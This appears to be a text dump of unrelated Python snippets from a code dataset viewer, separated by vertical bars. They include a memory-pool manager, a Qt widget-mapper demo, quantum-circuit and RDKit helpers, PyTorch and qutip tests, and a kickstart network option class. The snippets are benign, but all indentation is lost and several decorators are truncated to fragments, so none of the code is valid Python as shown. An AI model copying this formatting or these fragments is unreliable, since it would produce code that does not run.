def __init__(self, name: str=None, backend: str=LOCAL, memory_pool: Dict=None):
self.backend = backend
self.name = name
if (self.backend == LOCAL):
if (memory_pool is None):
memory_pool = {}
self.memory_pool = memory_pool
elif (self.backend == DATABASE):
with app.app_context():
self.redis_client = get_running_time_storage()
self.db_client = get_user_conversation_storage()
else:
raise ValueError('Unknown backend option: {}'.format(self.backend))
def get_pool_info_with_id(self, user_id: str, default_value: Union[(List, Dict)]) -> Any:
if (self.backend == LOCAL):
pool = self.memory_pool
if (user_id in pool):
return pool[user_id]
else:
return default_value
elif (self.backend == DATABASE):
memory_pool_name = f'{self.name}:{user_id}'
if self.redis_client.exists(memory_pool_name):
info = json.loads(self.redis_client.get(memory_pool_name))
else:
try:
if (self.name == 'api_key_pool'):
info = default_value
else:
raise NotImplementedError(f'Currently only support message pool in database, not {self.name}')
except Exception as e:
logger.bind(user_id=user_id, msg_head='Cache miss but not in database').warning('Failed to get pool info from database: {}'.format(e))
info = default_value
return info
def set_pool_info_with_id(self, user_id: str, info: Any) -> None:
if (self.backend == LOCAL):
pool = self.memory_pool
if (user_id not in pool):
pool[user_id] = info
elif (self.backend == DATABASE):
memory_pool_name = f'{self.name}:{user_id}'
self.redis_client.set(memory_pool_name, json.dumps(info))
def __iter__(self):
if (self.backend == LOCAL):
for (user_id, info) in self.memory_pool.items():
(yield (user_id, info))
elif (self.backend == DATABASE):
raise NotImplementedError('Currently not support UserMemoryManager iteration in database mode.') |
class Window(QWidget):
def __init__(self, parent=None):
super(Window, self).__init__(parent)
self.setupModel()
nameLabel = QLabel('Na&me:')
nameEdit = QLineEdit()
addressLabel = QLabel('&Address:')
addressEdit = QTextEdit()
ageLabel = QLabel('A&ge (in years):')
ageSpinBox = QSpinBox()
self.nextButton = QPushButton('&Next')
self.previousButton = QPushButton('&Previous')
nameLabel.setBuddy(nameEdit)
addressLabel.setBuddy(addressEdit)
ageLabel.setBuddy(ageSpinBox)
self.mapper = QDataWidgetMapper(self)
self.mapper.setModel(self.model)
self.mapper.addMapping(nameEdit, 0)
self.mapper.addMapping(addressEdit, 1)
self.mapper.addMapping(ageSpinBox, 2)
self.previousButton.clicked.connect(self.mapper.toPrevious)
self.nextButton.clicked.connect(self.mapper.toNext)
self.mapper.currentIndexChanged.connect(self.updateButtons)
layout = QGridLayout()
layout.addWidget(nameLabel, 0, 0, 1, 1)
layout.addWidget(nameEdit, 0, 1, 1, 1)
layout.addWidget(self.previousButton, 0, 2, 1, 1)
layout.addWidget(addressLabel, 1, 0, 1, 1)
layout.addWidget(addressEdit, 1, 1, 2, 1)
layout.addWidget(self.nextButton, 1, 2, 1, 1)
layout.addWidget(ageLabel, 3, 0, 1, 1)
layout.addWidget(ageSpinBox, 3, 1, 1, 1)
self.setLayout(layout)
self.setWindowTitle('Simple Widget Mapper')
self.mapper.toFirst()
def setupModel(self):
self.model = QStandardItemModel(5, 3, self)
names = ('Alice', 'Bob', 'Carol', 'Donald', 'Emma')
addresses = ('<qt>123 Main Street<br/>Market Town</qt>', '<qt>PO Box 32<br/>Mail Handling Service<br/>Service City</qt>', '<qt>The Lighthouse<br/>Remote Island</qt>', '<qt>47338 Park Avenue<br/>Big City</qt>', '<qt>Research Station<br/>Base Camp<br/>Big Mountain</qt>')
ages = ('20', '31', '32', '19', '26')
for (row, name) in enumerate(names):
item = QStandardItem(name)
self.model.setItem(row, 0, item)
item = QStandardItem(addresses[row])
self.model.setItem(row, 1, item)
item = QStandardItem(ages[row])
self.model.setItem(row, 2, item)
def updateButtons(self, row):
self.previousButton.setEnabled((row > 0))
self.nextButton.setEnabled((row < (self.model.rowCount() - 1))) |
def _binst_on_classical_vals(binst: BloqInstance, pred_cxns: Iterable[Connection], soq_assign: Dict[(Soquet, ClassicalValT)]):
for cxn in pred_cxns:
soq_assign[cxn.right] = soq_assign[cxn.left]
def _in_vals(reg: Register):
return _get_in_vals(binst, reg, soq_assign=soq_assign)
bloq = binst.bloq
in_vals = {reg.name: _in_vals(reg) for reg in bloq.signature.lefts()}
out_vals = bloq.on_classical_vals(**in_vals)
_update_assign_from_vals(bloq.signature.rights(), binst, out_vals, soq_assign) |
def ensure_image_locations(*names):
with db_transaction():
locations = ImageStorageLocation.select().where((ImageStorageLocation.name << names))
insert_names = list(names)
for location in locations:
insert_names.remove(location.name)
if (not insert_names):
return
data = [{'name': name} for name in insert_names]
ImageStorageLocation.insert_many(data).execute() |
class MaskedConv2d(nn.Conv2d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True):
super(MaskedConv2d, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias)
def forward(self, input, mask=None):
if (mask is None):
return super(MaskedConv2d, self).forward(input)
else:
return masked_conv2d(input, mask, self.weight, self.bias, self.padding) |
.filterwarnings('ignore:The input coordinates to pcolor:UserWarning')
def test_anim_spin_distribution():
j = 5
psi = qutip.spin_state(j, (- j))
psi = qutip.spin_coherent(j, (np.random.rand() * np.pi), ((np.random.rand() * 2) * np.pi))
theta = np.linspace(0, np.pi, 50)
phi = np.linspace(0, (2 * np.pi), 50)
(Q, THETA, PHI) = qutip.spin_q_function(psi, theta, phi)
(fig, ani) = qutip.anim_spin_distribution(([Q] * 2), THETA, PHI)
plt.close()
assert isinstance(fig, mpl.figure.Figure)
assert isinstance(ani, mpl.animation.ArtistAnimation) |
class Effect8048(BaseEffect):
type = 'passive'
def handler(fit, ship, context, projectionRange, **kwargs):
fit.modules.filteredItemBoost((lambda mod: mod.item.requiresSkill('Small Vorton Projector')), 'damageMultiplier', ship.getModifiedItemAttr('shipBonusUF2'), skill='EDENCOM Frigate', **kwargs) |
def cut(mol):
if (not mol.HasSubstructMatch(Chem.MolFromSmarts('[*]-;![*]'))):
return None
bis = random.choice(mol.GetSubstructMatches(Chem.MolFromSmarts('[*]-;![*]')))
bs = [mol.GetBondBetweenAtoms(bis[0], bis[1]).GetIdx()]
fragments_mol = Chem.FragmentOnBonds(mol, bs, addDummies=True, dummyLabels=[(1, 1)])
try:
return Chem.GetMolFrags(fragments_mol, asMols=True, sanitizeFrags=True)
except ValueError:
return None
return None |
def _nested_pack(flat_iter, structure):
if is_namedtuple(structure):
return type(structure)(*[_nested_pack(flat_iter, x) for x in structure])
elif isinstance(structure, (list, tuple)):
return type(structure)((_nested_pack(flat_iter, x) for x in structure))
elif isinstance(structure, dict):
return {k: _nested_pack(flat_iter, v) for (k, v) in sorted(structure.items())}
else:
return next(flat_iter) |
class ColorFormatter(logging.Formatter):
color_dic = {'DEBUG': 37, 'INFO': 36, 'WARNING': 33, 'ERROR': 31, 'CRITICAL': 41}
def format(self, record):
color = self.color_dic.get(record.levelname, 37)
record.levelname = '\x1b[{}m{}\x1b[0m'.format(color, record.levelname)
return logging.Formatter.format(self, record) |
class F27_Network(F25_Network):
removedKeywords = F25_Network.removedKeywords
removedAttrs = F25_Network.removedAttrs
def __init__(self, writePriority=0, *args, **kwargs):
self.bind_to_choices = [BIND_TO_MAC]
F25_Network.__init__(self, writePriority, *args, **kwargs)
def _getParser(self):
op = F25_Network._getParser(self)
op.add_argument('--bindto', dest='bindto', default=None, version=F27, choices=self.bind_to_choices, help='\n Optionally allows to specify how the connection\n configuration created for the device should be bound. If\n the option is not used, the connection binds to\n interface name (``DEVICE`` value in ifcfg file). For\n virtual devices (bond, team, bridge) it configures\n binding of slaves. Not applicable to vlan devices.\n\n Note that this option is independent of how the\n ``--device`` is specified.\n\n Currently only the value ``mac`` is suported.\n ``--bindto=mac`` will bind the connection to MAC address\n of the device (``HWADDR`` value in ifcfg file).\n\n For example::\n\n ``network --device=01:23:45:67:89:ab --bootproto=dhcp --bindto=mac``\n\n will bind the configuration of the device specified by\n MAC address ``01:23:45:67:89:ab`` to its MAC address.\n\n ``network --device=01:23:45:67:89:ab --bootproto=dhcp``\n\n will bind the configuration of the device specified by\n MAC address ``01:23:45:67:89:ab`` to its interface name\n (eg ``ens3``).\n\n ``network --device=ens3 --bootproto=dhcp --bindto=mac``\n\n will bind the configuration of the device specified by\n interface name ``ens3`` to its MAC address.\n ')
return op
def parse(self, args):
retval = F25_Network.parse(self, args)
if (retval.bindto == BIND_TO_MAC):
if (retval.vlanid and (not retval.bondopts)):
msg = (_('--bindto=%s is not supported for this type of device') % BIND_TO_MAC)
raise KickstartParseError(msg, lineno=self.lineno)
return retval |
class TestAddStateIndependentNormalScale():
def test_add_scale_basic(self, num_outputs=4):
module = nn.Linear(3, num_outputs)
module_normal = AddStateIndependentNormalScale(num_outputs)
tensor = torch.randn(3)
(loc, scale) = module_normal(module(tensor))
assert (loc.shape == (num_outputs,))
assert (scale.shape == (num_outputs,))
assert (scale > 0).all()
def test_add_scale_sequence(self, num_outputs=4):
module = nn.LSTM(3, num_outputs)
module_normal = AddStateIndependentNormalScale(num_outputs)
tensor = torch.randn(4, 2, 3)
(loc, scale, others) = module_normal(*module(tensor))
assert (loc.shape == (4, 2, num_outputs))
assert (scale.shape == (4, 2, num_outputs))
assert (scale > 0).all() |
(scope='session', autouse=True)
def clean_mask(zarr_dataset: ChunkedDataset) -> Iterator[None]:
agents_mask_path = (Path(zarr_dataset.path) / 'agents_mask')
if agents_mask_path.exists():
rmtree(str(agents_mask_path))
(yield None)
agents_mask_path = (Path(zarr_dataset.path) / 'agents_mask')
if agents_mask_path.exists():
rmtree(str(agents_mask_path)) |
def get_validation_parser(default_task=None):
parser = get_parser('Validation', default_task)
add_dataset_args(parser, train=True)
add_distributed_training_args(parser, default_world_size=1)
group = parser.add_argument_group('Evaluation')
gen_parser_from_dataclass(group, CommonEvalConfig())
return parser |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.